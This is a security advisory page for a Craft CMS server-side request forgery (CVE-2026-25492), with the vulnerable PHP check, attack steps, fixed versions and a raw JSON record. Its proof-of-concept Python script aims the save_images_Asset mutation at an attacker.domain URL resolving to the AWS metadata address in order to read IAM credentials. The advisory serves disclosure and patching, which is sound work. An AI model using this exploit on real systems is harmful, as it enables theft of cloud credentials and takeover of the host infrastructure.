GHSA-96PQ-HXPW-RGH8

Vulnerability from github – Published: 2026-02-09 20:35 – Updated: 2026-02-09 22:38
VLAI?
Summary
Craft CMS: save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host
Details

Summary

  • The save_images_Asset graphql mutation allows a user to give a url of an image to download. (Url must use a domain, not a raw IP.)
  • Attacker sets up domain attacker.domain with an A record of something like 169.254.169.254 (special AWS metadata IP)
  • Attacker invokes save_images_Asset with url: http://attacker.domain/latest/meta-data/iam/security-credentials and filename "foo.txt"
  • Craft fetches sensitive information on attacker's behalf, and makes it available for download at /assets/images/foo.txt
  • Normal checks to verify that image is valid are bypassed because of .txt extension
  • Normal checks to verify that url is not an IP address are bypassed because user provided a valid domain that resolves to a sensitive internal IP address

Details

handleUpload() in src/gql/resolvers/mutations/Assets.php contains the code that processes the save_images_Asset mutation.

It has some basic validation logic for the url parameter (source of the image) and filename parameter (what to save image as):

   } elseif (!empty($fileInformation['url'])) {
            $url = $fileInformation['url'];

            // make sure the hostname is alphanumeric and not an IP address
            $hostname = parse_url($url, PHP_URL_HOST);
            if (
                !filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) ||
                filter_var($hostname, FILTER_VALIDATE_IP)
            ) {
                throw new UserError("$url contains an invalid hostname.");
            }

            if (empty($fileInformation['filename'])) {
                $filename = AssetsHelper::prepareAssetName(pathinfo(UrlHelper::stripQueryString($url), PATHINFO_BASENAME));
            } else {
                $filename = AssetsHelper::prepareAssetName($fileInformation['filename']);
            }

            $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
            if (is_array($allowedExtensions) && !in_array($extension, $allowedExtensions, true)) {
                throw new AssetDisallowedExtensionException(Craft::t('app', "“{$extension}” is not an allowed file extension."));
            }

The upshot of this validation is that url must contain a hostname, not an IP, and filename must contain an allowed extension. If the allowed extension is a typical image extension, further validation will be done downstream to verify that the downloaded content is in fact an image.

An authenticated attacker can trick this mutation into fetching sensitive AWS metadata, or other sensitive information from the craft instance's internal network.

  • First, the attacker must register a domain -- e.g. attacker.domain.
  • Next, they must point their domain at the sensitive internal ip they'd like to access (e.g. 169.254.169.254)
  • Next, they make a request to save_images_Asset with url set to http://attacker.domain/sensitive/path with filename set to "something.txt"
  • Finally the attacker makes a http request to retrieve /assets/images/something.txt, which contains sensitive information

PoC

Preconditions

  • Graphql access must be enabled
  • Attacker must have access to a graphql token
  • Token must be configured to have access to save_images_Asset mutation
  • Attacker must have configured a domain, "attacker.domain" pointing to the sensitive internal IP address they'd like to access
  • .txt must be an allowed extension for uploads via save_images_Asset (as it is by default)

Code

import requests

# Replace GRAPHQL_ENDPOINT and BEARER_TOKEN per target.
GRAPHQL_ENDPOINT = 'http://localhost:8080/actions/graphql/api'
TOKEN = '<TOKEN HERE>'

mutation = '''
mutation SaveAsset($_file: FileInput!, $title: String, $focalPoint: String) { save_images_Asset(_file: $_file,
   title: $title, focalPoint: $focalPoint) { id title url filename focalPoint dateCreated } }
'''

variables = {
  '_file': {
    'url' : "http://attacker.domain/latest/meta-data/iam/security-credentials",
    'filename': 'foo.txt'

  },
  "title": "my photo",
  "focalPoint": "0.5;0.5"

}

resp = requests.post(GRAPHQL_ENDPOINT,
                     json={'query': mutation, 'variables': variables},
                     headers={'Authorization': f'Bearer {TOKEN}'})
print(resp.status_code, resp.text)

If attack is successful, response to running this script will be something like:

200 {"data":{"save_images_Asset":{"id":"211403","title":"my photo","url":"http://localhost:8080/assets/volumes/images/foo.txt","filename":"foo.txt","focalPoint":null,"dateCreated":"2025-12-18T09:45:24-08:00"}}}

Attacker can then download sensitive data by fetching http://localhost:8080/assets/volumes/images/foo.txt

Impact

Impacted users must:

  • Have graphql enabled
  • Have a graphql token created with permissions to use save_images_Asset
  • Have graphql token stolen by attacker or abused by malicious insider

Impact is heightened if:

  • craft is running on something like an AWS EC2 instance, which has a well-known, sensitive internal http address that can be accessed to fetch metadata.

Ultimate result is:

Attacker or malicious insider gets access to infrastructure craft is running on, not just craft itself.

Severity ?
5.3 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.21"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/craft"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.17"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/craft"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.5.0"
            },
            {
              "fixed": "4.16.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25492"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-09T20:35:23Z",
    "nvd_published_at": "2026-02-09T20:15:57Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n- The save_images_Asset graphql mutation allows a user to give a url of an image to download.  (Url must use a domain, not a raw IP.)\n- Attacker sets up domain attacker.domain with an A record of something like 169.254.169.254 (special AWS metadata IP)\n- Attacker invokes save_images_Asset with url: http://attacker.domain/latest/meta-data/iam/security-credentials and filename \"foo.txt\"\n- Craft fetches sensitive information on attacker\u0027s behalf, and makes it available for download at /assets/images/foo.txt\n- Normal checks to verify that image is valid are bypassed because of .txt extension\n- Normal checks to verify that url is not an IP address are bypassed because user provided a valid domain that resolves to a sensitive internal IP address\n\n### Details\n\nhandleUpload() in src/gql/resolvers/mutations/Assets.php contains the code that processes the save_images_Asset mutation.\n\nIt has some basic validation logic for the url parameter (source of the image) and filename parameter (what to save image as):\n\n```\n   } elseif (!empty($fileInformation[\u0027url\u0027])) {\n            $url = $fileInformation[\u0027url\u0027];\n\n            // make sure the hostname is alphanumeric and not an IP address\n            $hostname = parse_url($url, PHP_URL_HOST);\n            if (\n                !filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) ||\n                filter_var($hostname, FILTER_VALIDATE_IP)\n            ) {\n                throw new UserError(\"$url contains an invalid hostname.\");\n            }\n\n            if (empty($fileInformation[\u0027filename\u0027])) {\n                $filename = AssetsHelper::prepareAssetName(pathinfo(UrlHelper::stripQueryString($url), PATHINFO_BASENAME));\n            } else {\n                $filename = AssetsHelper::prepareAssetName($fileInformation[\u0027filename\u0027]);\n            }\n\n            $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));\n            if (is_array($allowedExtensions) \u0026\u0026 !in_array($extension, $allowedExtensions, true)) {\n                throw new AssetDisallowedExtensionException(Craft::t(\u0027app\u0027, \"\u201c{$extension}\u201d is not an allowed file extension.\"));\n            }\n```\n\nThe upshot of this validation is that url must contain a hostname, not an IP, and filename must contain an allowed extension.  If the allowed extension is a typical image extension, further validation will be done downstream  to verify that the downloaded content is in fact an image.\n\nAn authenticated attacker can trick this mutation into fetching sensitive AWS metadata, or other sensitive information from the craft instance\u0027s internal network.\n\n- First, the attacker must register a domain -- e.g. attacker.domain.  \n- Next, they must point their domain at the sensitive internal ip they\u0027d like to access (e.g. 169.254.169.254)\n- Next, they make a request to save_images_Asset with url set to http://attacker.domain/sensitive/path with filename set to \"something.txt\"\n- Finally the attacker makes a http request to retrieve /assets/images/something.txt, which contains sensitive information\n\n\n### PoC\n\n#### Preconditions\n\n- Graphql access must be enabled\n- Attacker must have access to a graphql token\n- Token must be configured to have access to save_images_Asset mutation\n- Attacker must have configured a domain, \"attacker.domain\" pointing to the sensitive internal IP address they\u0027d like to access\n- .txt must be an allowed extension for uploads via save_images_Asset (as it is by default)\n\n#### Code\n\n```\nimport requests\n\n# Replace GRAPHQL_ENDPOINT and BEARER_TOKEN per target.\nGRAPHQL_ENDPOINT = \u0027http://localhost:8080/actions/graphql/api\u0027\nTOKEN = \u0027\u003cTOKEN HERE\u003e\u0027\n\nmutation = \u0027\u0027\u0027\nmutation SaveAsset($_file: FileInput!, $title: String, $focalPoint: String) { save_images_Asset(_file: $_file,\n   title: $title, focalPoint: $focalPoint) { id title url filename focalPoint dateCreated } }\n\u0027\u0027\u0027\n\nvariables = {\n  \u0027_file\u0027: {\n    \u0027url\u0027 : \"http://attacker.domain/latest/meta-data/iam/security-credentials\",\n    \u0027filename\u0027: \u0027foo.txt\u0027\n\n  },\n  \"title\": \"my photo\",\n  \"focalPoint\": \"0.5;0.5\"\n\n}\n\nresp = requests.post(GRAPHQL_ENDPOINT,\n                     json={\u0027query\u0027: mutation, \u0027variables\u0027: variables},\n                     headers={\u0027Authorization\u0027: f\u0027Bearer {TOKEN}\u0027})\nprint(resp.status_code, resp.text)\n```\n\nIf attack is successful, response to running this script will be something like:\n\n```\n200 {\"data\":{\"save_images_Asset\":{\"id\":\"211403\",\"title\":\"my photo\",\"url\":\"http://localhost:8080/assets/volumes/images/foo.txt\",\"filename\":\"foo.txt\",\"focalPoint\":null,\"dateCreated\":\"2025-12-18T09:45:24-08:00\"}}}\n```\n\nAttacker can then download sensitive data by fetching http://localhost:8080/assets/volumes/images/foo.txt\n\n\n### Impact\n\nImpacted users must:\n\n- Have graphql enabled\n- Have a graphql token created with permissions to use save_images_Asset\n- Have graphql token stolen by attacker or abused by malicious insider\n\nImpact is heightened if:\n\n- craft is running on something like an AWS EC2 instance, which has a well-known, sensitive internal http address that can be accessed to fetch metadata.  \n\nUltimate result is:\n\nAttacker or malicious insider gets access to infrastructure craft is running on, not just craft itself.",
  "id": "GHSA-96pq-hxpw-rgh8",
  "modified": "2026-02-09T22:38:27Z",
  "published": "2026-02-09T20:35:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25492"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/4.16.18"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/5.8.22"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS: save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.